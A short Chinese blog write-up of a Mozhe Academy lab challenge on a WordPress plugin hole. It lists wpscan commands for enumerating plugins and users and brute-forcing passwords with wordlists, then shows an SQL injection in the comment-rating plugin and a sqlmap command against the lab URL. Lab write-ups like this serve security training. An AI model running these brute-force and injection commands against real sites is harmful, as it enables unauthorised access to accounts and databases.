墨者学院 - WordPress插件漏洞分析溯源

本题提示使用Wpscan扫描wordpress存在的漏洞

地址https://www.jianshu.com/p/a0143cc79215

附上wpscan使用方法

常见语法:
wpscan --url www.target.com --enumerate p #扫描插件基本信息
wpscan --url www.xxx.com --enumerate vp #扫描容易受攻击的插件
wpscan --url www.xxx.com --enumerate ap #扫描所有插件
wpscan --url www.target.com --enumerate u #暴力枚举用户名
wpscan --url www.example.com --wordlist E:\dic\passX.txt --username admin #通过用户名爆破密码
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50 #使用字典调用

首先是扫描 wpscan -url http://219.153.49.228:42250     发信漏洞
 

 

爆破数据库   wpscan -url http://219.153.49.228:42250  -enumerate u 

 

查看细节发现sql注入漏洞

 

http://219.153.49.228:42250//wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a

 构造sql注入

 

sqlmap -u "http://219.153.49.228:42250//wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" --dbs   获取当前数据库

posted @ 2018-09-20 15:07  小贱丶  阅读(1074)  评论(0)    收藏  举报